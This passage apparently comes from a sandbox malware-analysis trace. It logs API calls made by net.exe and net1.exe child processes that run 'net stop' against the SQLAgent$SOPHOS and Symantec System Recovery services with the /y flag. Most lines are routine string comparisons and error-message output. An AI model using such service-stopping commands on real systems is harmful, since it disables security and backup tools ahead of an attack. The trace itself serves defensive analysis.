returned -12 [0039.843] _wcsicmp (_String1="svr", _String2="SQLAGENT$SOPHOS") returned 5 [0039.843] _wcsicmp (_String1="srv", _String2="SQLAGENT$SOPHOS") returned 1 [0039.843] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SOPHOS") returned -7 [0039.843] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SOPHOS") returned -18 [0039.843] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SOPHOS") returned -5 [0039.843] NetServiceControl (in: servername=0x0, service="SQLAGENT$SOPHOS", opcode=0x0, arg=0x0, bufptr=0x31f6b4 | out: bufptr=0x31f6b4) returned 0x889 [0039.844] wcscpy_s (in: _Destination=0x97a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0039.844] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0039.847] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x97b338, nSize=0x800, Arguments=0x979dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0039.848] GetFileType (hFile=0x26c) returned 0x3 [0039.848] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x423f90 [0039.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x423f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0039.848] WriteFile (in: hFile=0x26c, lpBuffer=0x423f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31f5f4, lpOverlapped=0x0 | out: lpBuffer=0x423f90*, lpNumberOfBytesWritten=0x31f5f4*=0x1e, lpOverlapped=0x0) returned 1 [0039.848] LocalFree (hMem=0x423f90) returned 0x0 [0039.848] GetFileType (hFile=0x26c) returned 0x3 [0039.848] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426238 [0039.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0039.849] WriteFile (in: hFile=0x26c, lpBuffer=0x426238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f5f4, lpOverlapped=0x0 | out: lpBuffer=0x426238*, lpNumberOfBytesWritten=0x31f5f4*=0x2, lpOverlapped=0x0) returned 1 [0039.849] LocalFree (hMem=0x426238) returned 0x0 [0039.849] _ultow (in: _Dest=0x889, _Radix=3274276 | out: _Dest=0x889) returned="2185" [0039.849] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x97b338, nSize=0x800, Arguments=0x979dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0039.849] GetFileType (hFile=0x26c) returned 0x3 [0039.849] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x426238 [0039.849] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x426238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0039.849] WriteFile (in: hFile=0x26c, lpBuffer=0x426238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31f600, lpOverlapped=0x0 | out: lpBuffer=0x426238*, lpNumberOfBytesWritten=0x31f600*=0x34, lpOverlapped=0x0) returned 1 [0039.849] LocalFree (hMem=0x426238) returned 0x0 [0039.849] GetFileType (hFile=0x26c) returned 0x3 [0039.849] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x426238 [0039.849] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x426238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0039.849] WriteFile (in: hFile=0x26c, lpBuffer=0x426238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f600, lpOverlapped=0x0 | out: lpBuffer=0x426238*, lpNumberOfBytesWritten=0x31f600*=0x2, lpOverlapped=0x0) returned 1 [0039.849] LocalFree (hMem=0x426238) returned 0x0 [0039.849] NetApiBufferFree (Buffer=0x421c78) returned 0x0 [0039.850] NetApiBufferFree (Buffer=0x421c90) returned 0x0 [0039.850] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" [0039.850] exit (_Code=2) Process: id = "47" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4824b000" os_pid = "0x5b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Symantec System RecoveryΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0x570 Process: id = "48" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48b8d000" os_pid = "0x2c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x5b0" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Symantec System RecoveryΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0x56c [0039.998] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfc78 | out: lpSystemTimeAsFileTime=0xdfc78*(dwLowDateTime=0xe20a8420, dwHighDateTime=0x1d57a86)) [0039.998] GetCurrentProcessId () returned 0x2c8 [0039.998] GetCurrentThreadId () returned 0x56c [0039.998] GetTickCount () returned 0x1144ff5 [0039.998] QueryPerformanceCounter (in: lpPerformanceCount=0xdfc70 | out: lpPerformanceCount=0xdfc70*=16028248017) returned 1 [0039.998] GetModuleHandleA (lpModuleName=0x0) returned 0xfc0000 [0039.998] __set_app_type (_Type=0x1) [0039.998] __p__fmode () returned 0x74eb31f4 [0039.998] __p__commode () returned 0x74eb31fc [0039.998] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfcffe6) returned 0x0 [0039.998] __getmainargs (in: _Argc=0xfd9064, _Argv=0xfd906c, _Env=0xfd9068, _DoWildCard=0, _StartInfo=0xfd9024 | out: _Argc=0xfd9064, _Argv=0xfd906c, _Env=0xfd9068) returned 0 [0039.998] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.999] GetConsoleOutputCP () returned 0x1b5 [0040.007] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfd9080 | out: lpCPInfo=0xfd9080) returned 1 [0040.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.024] sprintf_s (in: _DstBuf=0xdfc30, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0040.024] setlocale (category=0, locale=".437") returned="English_United States.437" [0040.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0040.026] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0040.026] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Symantec System RecoveryΓÇ¥ /y" [0040.026] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdf9fc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0040.026] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x98) returned 0x263c48 [0040.026] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0040.026] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfc00 | out: Buffer=0xdfc00*=0x261ca8) returned 0x0 [0040.026] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xdfc00 | out: Buffer=0xdfc00*=0x261cc0) returned 0x0 [0040.026] _fileno (_File=0x74eb2900) returned -2 [0040.026] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0040.026] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0040.026] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0040.026] _wcsicmp (_String1="config", _String2="stop") returned -16 [0040.026] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0040.026] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0040.026] _wcsicmp (_String1="file", _String2="stop") returned -13 [0040.026] _wcsicmp (_String1="files", _String2="stop") returned -13 [0040.027] _wcsicmp (_String1="group", _String2="stop") returned -12 [0040.027] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0040.027] _wcsicmp (_String1="help", _String2="stop") returned -11 [0040.027] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0040.027] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0040.027] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0040.027] _wcsicmp (_String1="session", _String2="stop") returned -15 [0040.027] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0040.027] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0040.027] _wcsicmp (_String1="share", _String2="stop") returned -12 [0040.027] _wcsicmp (_String1="start", _String2="stop") returned -14 [0040.027] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0040.027] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0040.027] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0040.027] _wcsicmp (_String1="accounts", _String2="ΓÇ£Symantec") returned -850 [0040.027] _wcsicmp (_String1="computer", _String2="ΓÇ£Symantec") returned -848 [0040.027] _wcsicmp (_String1="config", _String2="ΓÇ£Symantec") returned -848 [0040.027] _wcsicmp (_String1="continue", _String2="ΓÇ£Symantec") returned -848 [0040.027] _wcsicmp (_String1="cont", _String2="ΓÇ£Symantec") returned -848 [0040.027] _wcsicmp (_String1="file", _String2="ΓÇ£Symantec") returned -845 [0040.027] _wcsicmp (_String1="files", _String2="ΓÇ£Symantec") returned -845 [0040.027] _wcsicmp (_String1="group", _String2="ΓÇ£Symantec") returned -844 [0040.027] _wcsicmp (_String1="groups", _String2="ΓÇ£Symantec") returned -844 [0040.028] _wcsicmp (_String1="help", _String2="ΓÇ£Symantec") returned -843 [0040.028] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Symantec") returned -843 [0040.028] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Symantec") returned -839 [0040.028] _wcsicmp (_String1="pause", _String2="ΓÇ£Symantec") returned -835 [0040.028] _wcsicmp (_String1="session", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="sessions", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="sess", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="share", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="start", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="stats", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="statistics", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="stop", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="time", _String2="ΓÇ£Symantec") returned -831 [0040.028] _wcsicmp (_String1="user", _String2="ΓÇ£Symantec") returned -830 [0040.028] _wcsicmp (_String1="users", _String2="ΓÇ£Symantec") returned -830 [0040.028] _wcsicmp (_String1="msg", _String2="ΓÇ£Symantec") returned -838 [0040.028] _wcsicmp (_String1="messenger", _String2="ΓÇ£Symantec") returned -838 [0040.028] _wcsicmp (_String1="receiver", _String2="ΓÇ£Symantec") returned -833 [0040.028] _wcsicmp (_String1="rcv", _String2="ΓÇ£Symantec") returned -833 [0040.028] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Symantec") returned -837 [0040.028] _wcsicmp (_String1="redirector", _String2="ΓÇ£Symantec") returned -833 [0040.028] _wcsicmp (_String1="redir", _String2="ΓÇ£Symantec") returned -833 [0040.028] _wcsicmp (_String1="rdr", _String2="ΓÇ£Symantec") returned -833 [0040.028] _wcsicmp (_String1="workstation", _String2="ΓÇ£Symantec") returned -828 [0040.028] _wcsicmp (_String1="work", _String2="ΓÇ£Symantec") returned -828 [0040.028] _wcsicmp (_String1="wksta", _String2="ΓÇ£Symantec") returned -828 [0040.028] _wcsicmp (_String1="prdr", _String2="ΓÇ£Symantec") returned -835 [0040.028] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Symantec") returned -847 [0040.028] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Symantec") returned -839 [0040.028] _wcsicmp (_String1="server", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="svr", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="srv", _String2="ΓÇ£Symantec") returned -832 [0040.028] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Symantec") returned -839 [0040.028] _wcsicmp (_String1="alerter", _String2="ΓÇ£Symantec") returned -850 [0040.028] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Symantec") returned -837 [0040.029] _wcsicmp (_String1="accounts", _String2="System") returned -18 [0040.029] _wcsicmp (_String1="computer", _String2="System") returned -16 [0040.029] _wcsicmp (_String1="config", _String2="System") returned -16 [0040.029] _wcsicmp (_String1="continue", _String2="System") returned -16 [0040.029] _wcsicmp (_String1="cont", _String2="System") returned -16 [0040.029] _wcsicmp (_String1="file", _String2="System") returned -13 [0040.029] _wcsicmp (_String1="files", _String2="System") returned -13 [0040.029] _wcsicmp (_String1="group", _String2="System") returned -12 [0040.029] _wcsicmp (_String1="groups", _String2="System") returned -12 [0040.029] _wcsicmp (_String1="help", _String2="System") returned -11 [0040.029] _wcsicmp (_String1="helpmsg", _String2="System") returned -11 [0040.029] _wcsicmp (_String1="localgroup", _String2="System") returned -7 [0040.029] _wcsicmp (_String1="pause", _String2="System") returned -3 [0040.029] _wcsicmp (_String1="session", _String2="System") returned -20 [0040.029] _wcsicmp (_String1="sessions", _String2="System") returned -20 [0040.029] _wcsicmp (_String1="sess", _String2="System") returned -20 [0040.029] _wcsicmp (_String1="share", _String2="System") returned -17 [0040.029] _wcsicmp (_String1="start", _String2="System") returned -5 [0040.029] _wcsicmp (_String1="stats", _String2="System") returned -5 [0040.029] _wcsicmp (_String1="statistics", _String2="System") returned -5 [0040.029] _wcsicmp (_String1="stop", _String2="System") returned -5 [0040.029] _wcsicmp (_String1="time", _String2="System") returned 1 [0040.029] _wcsicmp (_String1="user", _String2="System") returned 2 [0040.029] _wcsicmp (_String1="users", _String2="System") returned 2 [0040.029] _wcsicmp (_String1="msg", _String2="System") returned -6 [0040.029] _wcsicmp (_String1="messenger", _String2="System") returned -6 [0040.029] _wcsicmp (_String1="receiver", _String2="System") returned -1 [0040.029] _wcsicmp (_String1="rcv", _String2="System") returned -1 [0040.029] _wcsicmp (_String1="netpopup", _String2="System") returned -5 [0040.029] _wcsicmp (_String1="redirector", _String2="System") returned -1 [0040.029] _wcsicmp (_String1="redir", _String2="System") returned -1 [0040.030] _wcsicmp (_String1="rdr", _String2="System") returned -1 [0040.030] _wcsicmp (_String1="workstation", _String2="System") returned 4 [0040.030] _wcsicmp (_String1="work", _String2="System") returned 4 [0040.030] _wcsicmp (_String1="wksta", _String2="System") returned 4 [0040.030] _wcsicmp (_String1="prdr", _String2="System") returned -3 [0040.030] _wcsicmp (_String1="devrdr", _String2="System") returned -15 [0040.030] _wcsicmp (_String1="lanmanworkstation", _String2="System") returned -7 [0040.030] _wcsicmp (_String1="server", _String2="System") returned -20 [0040.030] _wcsicmp (_String1="svr", _String2="System") returned -3 [0040.030] _wcsicmp (_String1="srv", _String2="System") returned -7 [0040.030] _wcsicmp (_String1="lanmanserver", _String2="System") returned -7 [0040.030] _wcsicmp (_String1="alerter", _String2="System") returned -18 [0040.030] _wcsicmp (_String1="netlogon", _String2="System") returned -5 [0040.030] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0040.030] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.031] wcscpy_s (in: _Destination=0xdf700, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0040.031] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74710000 [0040.032] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0xdf6fc, nSize=0x0, Arguments=0xdf6f8 | out: lpBuffer="噘&neth.dll") returned 0xff [0040.033] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0040.033] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0040.034] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.034] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0040.034] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0040.034] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.034] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0040.034] _wcsicmp (_String1="CONT", _String2="ΓÇ£Symantec") returned -848 [0040.034] _wcsicmp (_String1="CONT", _String2="System") returned -16 [0040.034] _wcsicmp (_String1="CONT", _String2="RecoveryΓÇ¥") returned -15 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.034] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0040.034] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0040.034] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.034] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0040.034] _wcsicmp (_String1="FILES", _String2="ΓÇ£Symantec") returned -845 [0040.034] _wcsicmp (_String1="FILES", _String2="System") returned -13 [0040.034] _wcsicmp (_String1="FILES", _String2="RecoveryΓÇ¥") returned -12 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.034] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0040.034] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0040.034] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.034] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0040.034] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Symantec") returned -844 [0040.034] _wcsicmp (_String1="GROUPS", _String2="System") returned -12 [0040.034] _wcsicmp (_String1="GROUPS", _String2="RecoveryΓÇ¥") returned -11 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.034] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0040.034] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.034] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0040.034] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.034] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0040.035] _wcsicmp (_String1="REPL", _String2="ΓÇ£Symantec") returned -833 [0040.035] _wcsicmp (_String1="REPL", _String2="System") returned -1 [0040.035] _wcsicmp (_String1="REPL", _String2="RecoveryΓÇ¥") returned 13 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0040.035] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.035] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0040.035] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Symantec") returned -833 [0040.035] _wcsicmp (_String1="REPLICATOR", _String2="System") returned -1 [0040.035] _wcsicmp (_String1="REPLICATOR", _String2="RecoveryΓÇ¥") returned 13 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.035] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0040.035] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0040.035] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.035] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0040.035] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Symantec") returned -832 [0040.035] _wcsicmp (_String1="SESSIONS", _String2="System") returned -20 [0040.035] _wcsicmp (_String1="SESSIONS", _String2="RecoveryΓÇ¥") returned 1 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0040.035] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.035] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0040.035] _wcsicmp (_String1="SESS", _String2="ΓÇ£Symantec") returned -832 [0040.035] _wcsicmp (_String1="SESS", _String2="System") returned -20 [0040.035] _wcsicmp (_String1="SESS", _String2="RecoveryΓÇ¥") returned 1 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.035] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0040.035] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0040.035] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.035] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0040.035] _wcsicmp (_String1="STATS", _String2="ΓÇ£Symantec") returned -832 [0040.035] _wcsicmp (_String1="STATS", _String2="System") returned -5 [0040.035] _wcsicmp (_String1="STATS", _String2="RecoveryΓÇ¥") returned 1 [0040.035] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.036] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0040.036] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0040.036] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.036] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0040.036] _wcsicmp (_String1="USERS", _String2="ΓÇ£Symantec") returned -830 [0040.036] _wcsicmp (_String1="USERS", _String2="System") returned 2 [0040.036] _wcsicmp (_String1="USERS", _String2="RecoveryΓÇ¥") returned 3 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0040.036] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0040.036] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0040.036] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0040.036] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0040.036] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Symantec") returned -833 [0040.036] _wcsicmp (_String1="REDIRECTOR", _String2="System") returned -1 [0040.036] _wcsicmp (_String1="REDIRECTOR", _String2="RecoveryΓÇ¥") returned 1 [0040.036] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0040.036] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0040.036] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0040.036] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Symantec") returned -833 [0040.036] _wcsicmp (_String1="REDIR", _String2="System") returned -1 [0040.036] _wcsicmp (_String1="REDIR", 